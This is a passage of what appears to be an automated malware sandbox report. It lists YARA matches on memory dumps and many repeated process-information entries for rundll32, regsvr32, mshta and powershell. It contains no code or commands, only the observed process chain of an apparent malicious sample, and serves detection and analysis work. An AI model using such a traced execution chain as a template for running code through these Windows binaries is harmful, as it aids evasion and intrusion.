            Source: Yara match | File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
